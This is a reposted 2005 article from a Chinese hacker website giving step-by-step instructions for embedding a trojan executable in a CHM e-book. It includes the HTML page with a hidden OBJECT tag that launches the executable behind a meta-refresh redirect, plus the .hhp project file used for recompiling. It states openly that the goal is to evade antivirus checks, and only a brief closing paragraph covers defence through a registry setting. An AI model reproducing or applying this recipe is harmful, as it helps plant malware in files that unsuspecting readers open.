| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 |

您现在的位置： 中国X黑客小组 >> 技术文章 >> 黑客技术 >> 黑客教学 >> 文章正文 用户登录 新用户注册

[转载]CHM电子书木马制作攻略    热     ★★★ 【字体：小 大】
[转载]CHM电子书木马制作攻略
作者：陈一天    文章来源：CnXHacker.Net    点击数：    更新时间：2005-12-31
CHM电子书木马制作攻略 谈起CHM格式的电子书，可能无人不晓。有很大一部分电子图书都是使用CHM格式编译的。由于木马程序嵌入了电子书中，杀毒软件无法对其中存在的病毒等破坏性程序进行检查和清除。想知道这类电子书的制作方法吗？今天笔者就以实例形式和大家一道分析一下。 　　Step1:要想制作一个完美的CHM木马，当然少不了电子书的制作工具。在这里我们选择微软自家的Microsoft HTML Help Workshop。 　　当然了，作为木马程序的载体，一本CHM电子书是少不了的。本文演示所采用的是系统帮助文件中现成的windows.chm。 　　Step2:首先运行windows.chm，在右侧的空白处点击右键菜单，进入“属性”页。记录下该电子文档的默认主页default.htm和标题栏文字Windows 2000两项信息。 　　Step3:接下来需要制作一个可以让木马运行并且同时可以自动跳转到windows.chm默认主页的网页，例如cytkk.htm，源代码如下： ＜HTML＞ <HEAD> <meta http-equiv="refresh" content="3;url='default.htm'"> </HEAD> <BODY> <OBJECT Width=0 Height=0 style="display:none;" TYPE="application/x-oleobje ct" CODEBASE="灰色按钮克星.exe"> </OBJECT> </BODY> ＜/HTML＞ 　　代码注释：     　　content="3是转向时间（单位为秒），可以根据木马程序的运行时间自行修改，建议不要超过5秒。其中的default.htm可以改为你用的电子书的默认主页名，灰色按钮克星.exe为木马程序名，你可以根据情况更改。 　　Step4:运行HTML Help Workshop，选择文件菜单下的反编译项。接下来在反编译后的目录中可以看到windows.hhc（对应帮助文档左侧的“目录”项）和windows.hhk（对应帮助文档左侧的“索引”项）。 　　Step5:现在要做的就是把木马程序复制到反编译后的目录中（本文中以插入灰色按钮克星.exe这款小软件为例），并在此目录下建立一个例如文件名为cytkk.hhp的文件（用记事本即可），代码如下： [OPTIONS] Compatibility=1.1 Or later Compiled file=windows.chm Default Window=Main Language=0x804 中文(中国) [WINDOWS] Main="Windows 2000","windows.hhc","windows.hhk","cytkk.htm",,,,,,0x420,150,0x104E,,0x0,0x0,,,,,0 [FILES] cytkk.htm 　　灰色按钮克星.exe 　　代码注释： 　　windows.chm可以改为你要生成的电子书名，而灰色按钮克星.exe则把它改为要嵌入的木马程序名，Main=后面改为在第一步时你得到的标题栏文字，windows.hhc及windows.hhk分别改为第三步得到的文件名。 　　最后用HTML Help Workshop打开cytkk.hhp，点击“文件”→“编译”，待提示完成后，就可以在目标目录中发现已经编译好的带有木马的电子书windows.chm了。 　　高手传经：防之有道 　　我们不可能对下载的每本书都进行反编译工作来加以检查，那是会累死人的。笔者建议大家在下载电子书籍时，尽量去知名网站下载。 另外读者朋友们也可以修改本地安全属性，使CHM木马无法在本地运行木马程序，将注册表“HKEY_CURRENT_U SER\Software\Microsoft\Windows\Current Version\Internet Settings\Zones\0”下的1004项的值由原来十进制的0改为十六进制的3
文章录入：IceRiver    责任编辑：IceRiver
	上一篇文章： ODBC：web/sql分离环境下的一个思路 下一篇文章： 图片ASP木马
【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

最新热点		最新推荐		相关文章
				SQL入门:转换数据类型 [转载]战术攻防思维撷粹 [转载]菜鸟后门技巧 [转载]教你如何进入内网 [转载]Cygwin使用指南 用Snort从原理上检测MS05-05 MT.EXE程序测试报告 MS05-055漏洞分析[转贴]

网友评论：（只显示最新5条。评论内容只代表网友观点，与本站立场无关！）

关于我们 - 版权声明 - 帮助(？) - 广告服务 - 联系我们 - 友情链接 - 用户注册 -	Powered by ICE RIVER - STUDIO

» CnXHacker.CoM

© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved.